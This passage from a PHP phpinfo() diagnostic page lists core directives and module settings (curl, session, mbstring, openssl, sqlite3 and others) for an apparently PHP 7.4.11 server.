148 | <tr><td class="e">error_append_string</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
149 | <tr><td class="e">error_log</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
150 | <tr><td class="e">error_prepend_string</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
151 | <tr><td class="e">error_reporting</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
152 | <tr><td class="e">expose_php</td><td class="v">On</td><td class="v">On</td></tr>
153 | <tr><td class="e">extension_dir</td><td class="v">/usr/local/lib/php/extensions/no-debug-non-zts-20190902</td><td class="v">/usr/local/lib/php/extensions/no-debug-non-zts-20190902</td></tr>
154 | <tr><td class="e">file_uploads</td><td class="v">On</td><td class="v">On</td></tr>
155 | <tr><td class="e">hard_timeout</td><td class="v">2</td><td class="v">2</td></tr>
156 | <tr><td class="e">highlight.comment</td><td class="v"><font style="color: #FF8000">#FF8000</font></td><td class="v"><font style="color: #FF8000">#FF8000</font></td></tr>
157 | <tr><td class="e">highlight.default</td><td class="v"><font style="color: #0000BB">#0000BB</font></td><td class="v"><font style="color: #0000BB">#0000BB</font></td></tr>
158 | <tr><td class="e">highlight.html</td><td class="v"><font style="color: #000000">#000000</font></td><td class="v"><font style="color: #000000">#000000</font></td></tr>
159 | <tr><td class="e">highlight.keyword</td><td class="v"><font style="color: #007700">#007700</font></td><td class="v"><font style="color: #007700">#007700</font></td></tr>
160 | <tr><td class="e">highlight.string</td><td class="v"><font style="color: #DD0000">#DD0000</font></td><td class="v"><font style="color: #DD0000">#DD0000</font></td></tr>
161 | <tr><td class="e">html_errors</td><td class="v">On</td><td class="v">On</td></tr>
162 | <tr><td class="e">ignore_repeated_errors</td><td class="v">Off</td><td class="v">Off</td></tr>
163 | <tr><td class="e">ignore_repeated_source</td><td class="v">Off</td><td class="v">Off</td></tr>
164 | <tr><td class="e">ignore_user_abort</td><td class="v">Off</td><td class="v">Off</td></tr>
165 | <tr><td class="e">implicit_flush</td><td class="v">Off</td><td class="v">Off</td></tr>
166 | <tr><td class="e">include_path</td><td class="v">.:/usr/local/lib/php</td><td class="v">.:/usr/local/lib/php</td></tr>
167 | <tr><td class="e">input_encoding</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
168 | <tr><td class="e">internal_encoding</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
169 | <tr><td class="e">log_errors</td><td class="v">Off</td><td class="v">Off</td></tr>
170 | <tr><td class="e">log_errors_max_len</td><td class="v">1024</td><td class="v">1024</td></tr>
171 | <tr><td class="e">mail.add_x_header</td><td class="v">Off</td><td class="v">Off</td></tr>
172 | <tr><td class="e">mail.force_extra_parameters</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
173 | <tr><td class="e">mail.log</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
174 | <tr><td class="e">max_execution_time</td><td class="v">30</td><td class="v">30</td></tr>
175 | <tr><td class="e">max_file_uploads</td><td class="v">20</td><td class="v">20</td></tr>
176 | <tr><td class="e">max_input_nesting_level</td><td class="v">64</td><td class="v">64</td></tr>
177 | <tr><td class="e">max_input_time</td><td class="v">-1</td><td class="v">-1</td></tr>
178 | <tr><td class="e">max_input_vars</td><td class="v">1000</td><td class="v">1000</td></tr>
179 | <tr><td class="e">memory_limit</td><td class="v">128M</td><td class="v">128M</td></tr>
180 | <tr><td class="e">open_basedir</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
181 | <tr><td class="e">output_buffering</td><td class="v">0</td><td class="v">0</td></tr>
182 | <tr><td class="e">output_encoding</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
183 | <tr><td class="e">output_handler</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
184 | <tr><td class="e">post_max_size</td><td class="v">8M</td><td class="v">8M</td></tr>
185 | <tr><td class="e">precision</td><td class="v">14</td><td class="v">14</td></tr>
186 | <tr><td class="e">realpath_cache_size</td><td class="v">4096K</td><td class="v">4096K</td></tr>
187 | <tr><td class="e">realpath_cache_ttl</td><td class="v">120</td><td class="v">120</td></tr>
188 | <tr><td class="e">register_argc_argv</td><td class="v">On</td><td class="v">On</td></tr>
189 | <tr><td class="e">report_memleaks</td><td class="v">On</td><td class="v">On</td></tr>
190 | <tr><td class="e">report_zend_debug</td><td class="v">On</td><td class="v">On</td></tr>
191 | <tr><td class="e">request_order</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
192 | <tr><td class="e">sendmail_from</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
193 | <tr><td class="e">sendmail_path</td><td class="v">/usr/sbin/sendmail&nbsp;-t&nbsp;-i</td><td class="v">/usr/sbin/sendmail&nbsp;-t&nbsp;-i</td></tr>
194 | <tr><td class="e">serialize_precision</td><td class="v">-1</td><td class="v">-1</td></tr>
195 | <tr><td class="e">short_open_tag</td><td class="v">On</td><td class="v">On</td></tr>
196 | <tr><td class="e">SMTP</td><td class="v">localhost</td><td class="v">localhost</td></tr>
197 | <tr><td class="e">smtp_port</td><td class="v">25</td><td class="v">25</td></tr>
198 | <tr><td class="e">sys_temp_dir</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
199 | <tr><td class="e">syslog.facility</td><td class="v">LOG_USER</td><td class="v">LOG_USER</td></tr>
200 | <tr><td class="e">syslog.filter</td><td class="v">no-ctrl</td><td class="v">no-ctrl</td></tr>
201 | <tr><td class="e">syslog.ident</td><td class="v">php</td><td class="v">php</td></tr>
202 | <tr><td class="e">track_errors</td><td class="v">Off</td><td class="v">Off</td></tr>
203 | <tr><td class="e">unserialize_callback_func</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
204 | <tr><td class="e">upload_max_filesize</td><td class="v">2M</td><td class="v">2M</td></tr>
205 | <tr><td class="e">upload_tmp_dir</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
206 | <tr><td class="e">user_dir</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
207 | <tr><td class="e">user_ini.cache_ttl</td><td class="v">300</td><td class="v">300</td></tr>
208 | <tr><td class="e">user_ini.filename</td><td class="v">.user.ini</td><td class="v">.user.ini</td></tr>
209 | <tr><td class="e">variables_order</td><td class="v">EGPCS</td><td class="v">EGPCS</td></tr>
210 | <tr><td class="e">xmlrpc_error_number</td><td class="v">0</td><td class="v">0</td></tr>
211 | <tr><td class="e">xmlrpc_errors</td><td class="v">Off</td><td class="v">Off</td></tr>
212 | <tr><td class="e">zend.assertions</td><td class="v">1</td><td class="v">1</td></tr>
213 | <tr><td class="e">zend.detect_unicode</td><td class="v">On</td><td class="v">On</td></tr>
214 | <tr><td class="e">zend.enable_gc</td><td class="v">On</td><td class="v">On</td></tr>
215 | <tr><td class="e">zend.exception_ignore_args</td><td class="v">Off</td><td class="v">Off</td></tr>
216 | <tr><td class="e">zend.multibyte</td><td class="v">Off</td><td class="v">Off</td></tr>
217 | <tr><td class="e">zend.script_encoding</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
218 | <tr><td class="e">zend.signal_check</td><td class="v">Off</td><td class="v">Off</td></tr>
219 | </table>
220 | <h2><a name="module_ctype">ctype</a></h2>
221 | <table>
222 | <tr><td class="e">ctype functions </td><td class="v">enabled </td></tr>
223 | </table>
224 | <h2><a name="module_curl">curl</a></h2>
225 | <table>
226 | <tr><td class="e">cURL support </td><td class="v">enabled </td></tr>
227 | <tr><td class="e">cURL Information </td><td class="v">7.64.0 </td></tr>
228 | <tr><td class="e">Age </td><td class="v">4 </td></tr>
229 | <tr><td class="e">Features </td></tr>
230 | <tr><td class="e">AsynchDNS </td><td class="v">Yes </td></tr>
231 | <tr><td class="e">CharConv </td><td class="v">No </td></tr>
232 | <tr><td class="e">Debug </td><td class="v">No </td></tr>
233 | <tr><td class="e">GSS-Negotiate </td><td class="v">No </td></tr>
234 | <tr><td class="e">IDN </td><td class="v">Yes </td></tr>
235 | <tr><td class="e">IPv6 </td><td class="v">Yes </td></tr>
236 | <tr><td class="e">krb4 </td><td class="v">No </td></tr>
237 | <tr><td class="e">Largefile </td><td class="v">Yes </td></tr>
238 | <tr><td class="e">libz </td><td class="v">Yes </td></tr>
239 | <tr><td class="e">NTLM </td><td class="v">Yes </td></tr>
240 | <tr><td class="e">NTLMWB </td><td class="v">Yes </td></tr>
241 | <tr><td class="e">SPNEGO </td><td class="v">Yes </td></tr>
242 | <tr><td class="e">SSL </td><td class="v">Yes </td></tr>
243 | <tr><td class="e">SSPI </td><td class="v">No </td></tr>
244 | <tr><td class="e">TLS-SRP </td><td class="v">Yes </td></tr>
245 | <tr><td class="e">HTTP2 </td><td class="v">Yes </td></tr>
246 | <tr><td class="e">GSSAPI </td><td class="v">Yes </td></tr>
247 | <tr><td class="e">KERBEROS5 </td><td class="v">Yes </td></tr>
248 | <tr><td class="e">UNIX_SOCKETS </td><td class="v">Yes </td></tr>
249 | <tr><td class="e">PSL </td><td class="v">Yes </td></tr>
250 | <tr><td class="e">HTTPS_PROXY </td><td class="v">Yes </td></tr>
251 | <tr><td class="e">MULTI_SSL </td><td class="v">No </td></tr>
252 | <tr><td class="e">BROTLI </td><td class="v">No </td></tr>
253 | <tr><td class="e">Protocols </td><td class="v">dict, file, ftp, ftps, gopher, http, https, imap, imaps, ldap, ldaps, pop3, pop3s, rtmp, rtsp, scp, sftp, smb, smbs, smtp, smtps, telnet, tftp </td></tr>
254 | <tr><td class="e">Host </td><td class="v">x86_64-pc-linux-gnu </td></tr>
255 | <tr><td class="e">SSL Version </td><td class="v">OpenSSL/1.1.1d </td></tr>
256 | <tr><td class="e">ZLib Version </td><td class="v">1.2.11 </td></tr>
257 | <tr><td class="e">libSSH Version </td><td class="v">libssh2/1.8.0 </td></tr>
258 | </table>
259 | <table>
260 | <tr class="h"><th>Directive</th><th>Local Value</th><th>Master Value</th></tr>
261 | <tr><td class="e">curl.cainfo</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
262 | </table>
263 | <h2><a name="module_date">date</a></h2>
264 | <table>
265 | <tr><td class="e">date/time support </td><td class="v">enabled </td></tr>
266 | <tr><td class="e">timelib version </td><td class="v">2018.04 </td></tr>
267 | <tr><td class="e">&quot;Olson&quot; Timezone Database Version </td><td class="v">2020.1 </td></tr>
268 | <tr><td class="e">Timezone Database </td><td class="v">internal </td></tr>
269 | <tr><td class="e">Default timezone </td><td class="v">UTC </td></tr>
270 | </table>
271 | <table>
272 | <tr class="h"><th>Directive</th><th>Local Value</th><th>Master Value</th></tr>
273 | <tr><td class="e">date.default_latitude</td><td class="v">31.7667</td><td class="v">31.7667</td></tr>
274 | <tr><td class="e">date.default_longitude</td><td class="v">35.2333</td><td class="v">35.2333</td></tr>
275 | <tr><td class="e">date.sunrise_zenith</td><td class="v">90.583333</td><td class="v">90.583333</td></tr>
276 | <tr><td class="e">date.sunset_zenith</td><td class="v">90.583333</td><td class="v">90.583333</td></tr>
277 | <tr><td class="e">date.timezone</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
278 | </table>
279 | <h2><a name="module_dom">dom</a></h2>
280 | <table>
281 | <tr><td class="e">DOM/XML </td><td class="v">enabled </td></tr>
282 | <tr><td class="e">DOM/XML API Version </td><td class="v">20031129 </td></tr>
283 | <tr><td class="e">libxml Version </td><td class="v">2.9.4 </td></tr>
284 | <tr><td class="e">HTML Support </td><td class="v">enabled </td></tr>
285 | <tr><td class="e">XPath Support </td><td class="v">enabled </td></tr>
286 | <tr><td class="e">XPointer Support </td><td class="v">enabled </td></tr>
287 | <tr><td class="e">Schema Support </td><td class="v">enabled </td></tr>
288 | <tr><td class="e">RelaxNG Support </td><td class="v">enabled </td></tr>
289 | </table>
290 | <h2><a name="module_fileinfo">fileinfo</a></h2>
291 | <table>
292 | <tr><td class="e">fileinfo support </td><td class="v">enabled </td></tr>
293 | <tr><td class="e">libmagic </td><td class="v">537 </td></tr>
294 | </table>
295 | <h2><a name="module_filter">filter</a></h2>
296 | <table>
297 | <tr><td class="e">Input Validation and Filtering </td><td class="v">enabled </td></tr>
298 | </table>
299 | <table>
300 | <tr class="h"><th>Directive</th><th>Local Value</th><th>Master Value</th></tr>
301 | <tr><td class="e">filter.default</td><td class="v">unsafe_raw</td><td class="v">unsafe_raw</td></tr>
302 | <tr><td class="e">filter.default_flags</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
303 | </table>
304 | <h2><a name="module_ftp">ftp</a></h2>
305 | <table>
306 | <tr><td class="e">FTP support </td><td class="v">enabled </td></tr>
307 | <tr><td class="e">FTPS support </td><td class="v">enabled </td></tr>
308 | </table>
309 | <h2><a name="module_hash">hash</a></h2>
310 | <table>
311 | <tr><td class="e">hash support </td><td class="v">enabled </td></tr>
312 | <tr><td class="e">Hashing Engines </td><td class="v">md2 md4 md5 sha1 sha224 sha256 sha384 sha512/224 sha512/256 sha512 sha3-224 sha3-256 sha3-384 sha3-512 ripemd128 ripemd160 ripemd256 ripemd320 whirlpool tiger128,3 tiger160,3 tiger192,3 tiger128,4 tiger160,4 tiger192,4 snefru snefru256 gost gost-crypto adler32 crc32 crc32b crc32c fnv132 fnv1a32 fnv164 fnv1a64 joaat haval128,3 haval160,3 haval192,3 haval224,3 haval256,3 haval128,4 haval160,4 haval192,4 haval224,4 haval256,4 haval128,5 haval160,5 haval192,5 haval224,5 haval256,5  </td></tr>
313 | </table>
314 | <table>
315 | <tr><td class="e">MHASH support </td><td class="v">Enabled </td></tr>
316 | <tr><td class="e">MHASH API Version </td><td class="v">Emulated Support </td></tr>
317 | </table>
318 | <h2><a name="module_iconv">iconv</a></h2>
319 | <table>
320 | <tr><td class="e">iconv support </td><td class="v">enabled </td></tr>
321 | <tr><td class="e">iconv implementation </td><td class="v">glibc </td></tr>
322 | <tr><td class="e">iconv library version </td><td class="v">2.28 </td></tr>
323 | </table>
324 | <table>
325 | <tr class="h"><th>Directive</th><th>Local Value</th><th>Master Value</th></tr>
326 | <tr><td class="e">iconv.input_encoding</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
327 | <tr><td class="e">iconv.internal_encoding</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
328 | <tr><td class="e">iconv.output_encoding</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
329 | </table>
330 | <h2><a name="module_json">json</a></h2>
331 | <table>
332 | <tr><td class="e">json support </td><td class="v">enabled </td></tr>
333 | </table>
334 | <h2><a name="module_libxml">libxml</a></h2>
335 | <table>
336 | <tr><td class="e">libXML support </td><td class="v">active </td></tr>
337 | <tr><td class="e">libXML Compiled Version </td><td class="v">2.9.4 </td></tr>
338 | <tr><td class="e">libXML Loaded Version </td><td class="v">20904 </td></tr>
339 | <tr><td class="e">libXML streams </td><td class="v">enabled </td></tr>
340 | </table>
341 | <h2><a name="module_mbstring">mbstring</a></h2>
342 | <table>
343 | <tr><td class="e">Multibyte Support </td><td class="v">enabled </td></tr>
344 | <tr><td class="e">Multibyte string engine </td><td class="v">libmbfl </td></tr>
345 | <tr><td class="e">HTTP input encoding translation </td><td class="v">disabled </td></tr>
346 | <tr><td class="e">libmbfl version </td><td class="v">1.3.2 </td></tr>
347 | </table>
348 | <table>
349 | <tr class="h"><th>mbstring extension makes use of "streamable kanji code filter and converter", which is distributed under the GNU Lesser General Public License version 2.1.</th></tr>
350 | </table>
351 | <table>
352 | <tr><td class="e">Multibyte (japanese) regex support </td><td class="v">enabled </td></tr>
353 | <tr><td class="e">Multibyte regex (oniguruma) version </td><td class="v">6.9.1 </td></tr>
354 | </table>
355 | <table>
356 | <tr class="h"><th>Directive</th><th>Local Value</th><th>Master Value</th></tr>
357 | <tr><td class="e">mbstring.detect_order</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
358 | <tr><td class="e">mbstring.encoding_translation</td><td class="v">Off</td><td class="v">Off</td></tr>
359 | <tr><td class="e">mbstring.func_overload</td><td class="v">0</td><td class="v">0</td></tr>
360 | <tr><td class="e">mbstring.http_input</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
361 | <tr><td class="e">mbstring.http_output</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
362 | <tr><td class="e">mbstring.http_output_conv_mimetypes</td><td class="v">^(text/|application/xhtml\+xml)</td><td class="v">^(text/|application/xhtml\+xml)</td></tr>
363 | <tr><td class="e">mbstring.internal_encoding</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
364 | <tr><td class="e">mbstring.language</td><td class="v">neutral</td><td class="v">neutral</td></tr>
365 | <tr><td class="e">mbstring.regex_retry_limit</td><td class="v">1000000</td><td class="v">1000000</td></tr>
366 | <tr><td class="e">mbstring.regex_stack_limit</td><td class="v">100000</td><td class="v">100000</td></tr>
367 | <tr><td class="e">mbstring.strict_detection</td><td class="v">Off</td><td class="v">Off</td></tr>
368 | <tr><td class="e">mbstring.substitute_character</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
369 | </table>
370 | <h2><a name="module_mysqlnd">mysqlnd</a></h2>
371 | <table>
372 | <tr class="h"><th>mysqlnd</th><th>enabled</th></tr>
373 | <tr><td class="e">Version </td><td class="v">mysqlnd 7.4.11 </td></tr>
374 | <tr><td class="e">Compression </td><td class="v">supported </td></tr>
375 | <tr><td class="e">core SSL </td><td class="v">supported </td></tr>
376 | <tr><td class="e">extended SSL </td><td class="v">supported </td></tr>
377 | <tr><td class="e">Command buffer size </td><td class="v">4096 </td></tr>
378 | <tr><td class="e">Read buffer size </td><td class="v">32768 </td></tr>
379 | <tr><td class="e">Read timeout </td><td class="v">86400 </td></tr>
380 | <tr><td class="e">Collecting statistics </td><td class="v">Yes </td></tr>
381 | <tr><td class="e">Collecting memory statistics </td><td class="v">No </td></tr>
382 | <tr><td class="e">Tracing </td><td class="v">n/a </td></tr>
383 | <tr><td class="e">Loaded plugins </td><td class="v">mysqlnd,debug_trace,auth_plugin_mysql_native_password,auth_plugin_mysql_clear_password,auth_plugin_caching_sha2_password,auth_plugin_sha256_password </td></tr>
384 | <tr><td class="e">API Extensions </td><td class="v"><i>no value</i> </td></tr>
385 | </table>
386 | <h2><a name="module_openssl">openssl</a></h2>
387 | <table>
388 | <tr><td class="e">OpenSSL support </td><td class="v">enabled </td></tr>
389 | <tr><td class="e">OpenSSL Library Version </td><td class="v">OpenSSL 1.1.1d  10 Sep 2019 </td></tr>
390 | <tr><td class="e">OpenSSL Header Version </td><td class="v">OpenSSL 1.1.1d  10 Sep 2019 </td></tr>
391 | <tr><td class="e">Openssl default config </td><td class="v">/usr/lib/ssl/openssl.cnf </td></tr>
392 | </table>
393 | <table>
394 | <tr class="h"><th>Directive</th><th>Local Value</th><th>Master Value</th></tr>
395 | <tr><td class="e">openssl.cafile</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
396 | <tr><td class="e">openssl.capath</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
397 | </table>
398 | <h2><a name="module_pcre">pcre</a></h2>
399 | <table>
400 | <tr><td class="e">PCRE (Perl Compatible Regular Expressions) Support </td><td class="v">enabled </td></tr>
401 | <tr><td class="e">PCRE Library Version </td><td class="v">10.34 2019-11-21 </td></tr>
402 | <tr><td class="e">PCRE Unicode Version </td><td class="v">12.1.0 </td></tr>
403 | <tr><td class="e">PCRE JIT Support </td><td class="v">enabled </td></tr>
404 | <tr><td class="e">PCRE JIT Target </td><td class="v">x86 64bit (little endian + unaligned) </td></tr>
405 | </table>
406 | <table>
407 | <tr class="h"><th>Directive</th><th>Local Value</th><th>Master Value</th></tr>
408 | <tr><td class="e">pcre.backtrack_limit</td><td class="v">1000000</td><td class="v">1000000</td></tr>
409 | <tr><td class="e">pcre.jit</td><td class="v">1</td><td class="v">1</td></tr>
410 | <tr><td class="e">pcre.recursion_limit</td><td class="v">100000</td><td class="v">100000</td></tr>
411 | </table>
412 | <h2><a name="module_pdo">PDO</a></h2>
413 | <table>
414 | <tr class="h"><th>PDO support</th><th>enabled</th></tr>
415 | <tr><td class="e">PDO drivers </td><td class="v">sqlite </td></tr>
416 | </table>
417 | <h2><a name="module_pdo_sqlite">pdo_sqlite</a></h2>
418 | <table>
419 | <tr class="h"><th>PDO Driver for SQLite 3.x</th><th>enabled</th></tr>
420 | <tr><td class="e">SQLite Library </td><td class="v">3.27.2 </td></tr>
421 | </table>
422 | <h2><a name="module_phar">Phar</a></h2>
423 | <table>
424 | <tr class="h"><th>Phar: PHP Archive support</th><th>enabled</th></tr>
425 | <tr><td class="e">Phar API version </td><td class="v">1.1.1 </td></tr>
426 | <tr><td class="e">Phar-based phar archives </td><td class="v">enabled </td></tr>
427 | <tr><td class="e">Tar-based phar archives </td><td class="v">enabled </td></tr>
428 | <tr><td class="e">ZIP-based phar archives </td><td class="v">enabled </td></tr>
429 | <tr><td class="e">gzip compression </td><td class="v">enabled </td></tr>
430 | <tr><td class="e">bzip2 compression </td><td class="v">disabled (install ext/bz2) </td></tr>
431 | <tr><td class="e">Native OpenSSL support </td><td class="v">enabled </td></tr>
432 | </table>
433 | <table>
434 | <tr class="v"><td>
435 | Phar based on pear/PHP_Archive, original concept by Davey Shafik.<br />Phar fully realized by Gregory Beaver and Marcus Boerger.<br />Portions of tar implementation Copyright (c) 2003-2009 Tim Kientzle.</td></tr>
436 | </table>
437 | <table>
438 | <tr class="h"><th>Directive</th><th>Local Value</th><th>Master Value</th></tr>
439 | <tr><td class="e">phar.cache_list</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
440 | <tr><td class="e">phar.readonly</td><td class="v">On</td><td class="v">On</td></tr>
441 | <tr><td class="e">phar.require_hash</td><td class="v">On</td><td class="v">On</td></tr>
442 | </table>
443 | <h2><a name="module_posix">posix</a></h2>
444 | <table>
445 | <tr><td class="e">POSIX support </td><td class="v">enabled </td></tr>
446 | </table>
447 | <h2><a name="module_reflection">Reflection</a></h2>
448 | <table>
449 | <tr><td class="e">Reflection </td><td class="v">enabled </td></tr>
450 | </table>
451 | <h2><a name="module_session">session</a></h2>
452 | <table>
453 | <tr><td class="e">Session Support </td><td class="v">enabled </td></tr>
454 | <tr><td class="e">Registered save handlers </td><td class="v">files user  </td></tr>
455 | <tr><td class="e">Registered serializer handlers </td><td class="v">php_serialize php php_binary  </td></tr>
456 | </table>
457 | <table>
458 | <tr class="h"><th>Directive</th><th>Local Value</th><th>Master Value</th></tr>
459 | <tr><td class="e">session.auto_start</td><td class="v">Off</td><td class="v">Off</td></tr>
460 | <tr><td class="e">session.cache_expire</td><td class="v">180</td><td class="v">180</td></tr>
461 | <tr><td class="e">session.cache_limiter</td><td class="v">nocache</td><td class="v">nocache</td></tr>
462 | <tr><td class="e">session.cookie_domain</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
463 | <tr><td class="e">session.cookie_httponly</td><td class="v">0</td><td class="v">0</td></tr>
464 | <tr><td class="e">session.cookie_lifetime</td><td class="v">0</td><td class="v">0</td></tr>
465 | <tr><td class="e">session.cookie_path</td><td class="v">/</td><td class="v">/</td></tr>
466 | <tr><td class="e">session.cookie_samesite</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
467 | <tr><td class="e">session.cookie_secure</td><td class="v">0</td><td class="v">0</td></tr>
468 | <tr><td class="e">session.gc_divisor</td><td class="v">100</td><td class="v">100</td></tr>
469 | <tr><td class="e">session.gc_maxlifetime</td><td class="v">1440</td><td class="v">1440</td></tr>
470 | <tr><td class="e">session.gc_probability</td><td class="v">1</td><td class="v">1</td></tr>
471 | <tr><td class="e">session.lazy_write</td><td class="v">On</td><td class="v">On</td></tr>
472 | <tr><td class="e">session.name</td><td class="v">PHPSESSID</td><td class="v">PHPSESSID</td></tr>
473 | <tr><td class="e">session.referer_check</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
474 | <tr><td class="e">session.save_handler</td><td class="v">files</td><td class="v">files</td></tr>
475 | <tr><td class="e">session.save_path</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
476 | <tr><td class="e">session.serialize_handler</td><td class="v">php</td><td class="v">php</td></tr>
477 | <tr><td class="e">session.sid_bits_per_character</td><td class="v">4</td><td class="v">4</td></tr>
478 | <tr><td class="e">session.sid_length</td><td class="v">32</td><td class="v">32</td></tr>
479 | <tr><td class="e">session.upload_progress.cleanup</td><td class="v">On</td><td class="v">On</td></tr>
480 | <tr><td class="e">session.upload_progress.enabled</td><td class="v">On</td><td class="v">On</td></tr>
481 | <tr><td class="e">session.upload_progress.freq</td><td class="v">1%</td><td class="v">1%</td></tr>
482 | <tr><td class="e">session.upload_progress.min_freq</td><td class="v">1</td><td class="v">1</td></tr>
483 | <tr><td class="e">session.upload_progress.name</td><td class="v">PHP_SESSION_UPLOAD_PROGRESS</td><td class="v">PHP_SESSION_UPLOAD_PROGRESS</td></tr>
484 | <tr><td class="e">session.upload_progress.prefix</td><td class="v">upload_progress_</td><td class="v">upload_progress_</td></tr>
485 | <tr><td class="e">session.use_cookies</td><td class="v">1</td><td class="v">1</td></tr>
486 | <tr><td class="e">session.use_only_cookies</td><td class="v">1</td><td class="v">1</td></tr>
487 | <tr><td class="e">session.use_strict_mode</td><td class="v">0</td><td class="v">0</td></tr>
488 | <tr><td class="e">session.use_trans_sid</td><td class="v">0</td><td class="v">0</td></tr>
489 | </table>
490 | <h2><a name="module_simplexml">SimpleXML</a></h2>
491 | <table>
492 | <tr><td class="e">SimpleXML support </td><td class="v">enabled </td></tr>
493 | <tr><td class="e">Schema support </td><td class="v">enabled </td></tr>
494 | </table>
495 | <h2><a name="module_sodium">sodium</a></h2>
496 | <table>
497 | <tr class="h"><th>sodium support</th><th>enabled</th></tr>
498 | <tr><td class="e">libsodium headers version </td><td class="v">1.0.17 </td></tr>
499 | <tr><td class="e">libsodium library version </td><td class="v">1.0.17 </td></tr>
500 | </table>
501 | <h2><a name="module_spl">SPL</a></h2>
502 | <table>
503 | <tr class="h"><th>SPL support</th><th>enabled</th></tr>
504 | <tr><td class="e">Interfaces </td><td class="v">OuterIterator, RecursiveIterator, SeekableIterator, SplObserver, SplSubject </td></tr>
505 | <tr><td class="e">Classes </td><td class="v">AppendIterator, ArrayIterator, ArrayObject, BadFunctionCallException, BadMethodCallException, CachingIterator, CallbackFilterIterator, DirectoryIterator, DomainException, EmptyIterator, FilesystemIterator, FilterIterator, GlobIterator, InfiniteIterator, InvalidArgumentException, IteratorIterator, LengthException, LimitIterator, LogicException, MultipleIterator, NoRewindIterator, OutOfBoundsException, OutOfRangeException, OverflowException, ParentIterator, RangeException, RecursiveArrayIterator, RecursiveCachingIterator, RecursiveCallbackFilterIterator, RecursiveDirectoryIterator, RecursiveFilterIterator, RecursiveIteratorIterator, RecursiveRegexIterator, RecursiveTreeIterator, RegexIterator, RuntimeException, SplDoublyLinkedList, SplFileInfo, SplFileObject, SplFixedArray, SplHeap, SplMinHeap, SplMaxHeap, SplObjectStorage, SplPriorityQueue, SplQueue, SplStack, SplTempFileObject, UnderflowException, UnexpectedValueException </td></tr>
506 | </table>
507 | <h2><a name="module_sqlite3">sqlite3</a></h2>
508 | <table>
509 | <tr class="h"><th>SQLite3 support</th><th>enabled</th></tr>
510 | <tr><td class="e">SQLite Library </td><td class="v">3.27.2 </td></tr>
511 | </table>
512 | <table>
513 | <tr class="h"><th>Directive</th><th>Local Value</th><th>Master Value</th></tr>
514 | <tr><td class="e">sqlite3.defensive</td><td class="v">1</td><td class="v">1</td></tr>
515 | <tr><td class="e">sqlite3.extension_dir</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
516 | </table>
517 | <h2><a name="module_standard">standard</a></h2>
518 | <table>
519 | <tr><td class="e">Dynamic Library Support </td><td class="v">enabled </td></tr>
520 | <tr><td class="e">Path to sendmail </td><td class="v">/usr/sbin/sendmail -t -i </td></tr>
521 | </table>
522 | <table>
523 | <tr class="h"><th>Directive</th><th>Local Value</th><th>Master Value</th></tr>
524 | <tr><td class="e">assert.active</td><td class="v">1</td><td class="v">1</td></tr>
525 | <tr><td class="e">assert.bail</td><td class="v">0</td><td class="v">0</td></tr>
526 | <tr><td class="e">assert.callback</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
527 | <tr><td class="e">assert.exception</td><td class="v">0</td><td class="v">0</td></tr>
528 | <tr><td class="e">assert.quiet_eval</td><td class="v">0</td><td class="v">0</td></tr>
529 | <tr><td class="e">assert.warning</td><td class="v">1</td><td class="v">1</td></tr>
530 | <tr><td class="e">auto_detect_line_endings</td><td class="v">0</td><td class="v">0</td></tr>
531 | <tr><td class="e">default_socket_timeout</td><td class="v">60</td><td class="v">60</td></tr>
532 | <tr><td class="e">from</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
533 | <tr><td class="e">session.trans_sid_hosts</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
534 | <tr><td class="e">session.trans_sid_tags</td><td class="v">a=href,area=href,frame=src,form=</td><td class="v">a=href,area=href,frame=src,form=</td></tr>
535 | <tr><td class="e">unserialize_max_depth</td><td class="v">4096</td><td class="v">4096</td></tr>
536 | <tr><td class="e">url_rewriter.hosts</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
537 | <tr><td class="e">url_rewriter.tags</td><td class="v">form=</td><td class="v">form=</td></tr>
538 | <tr><td class="e">user_agent</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
539 | </table>
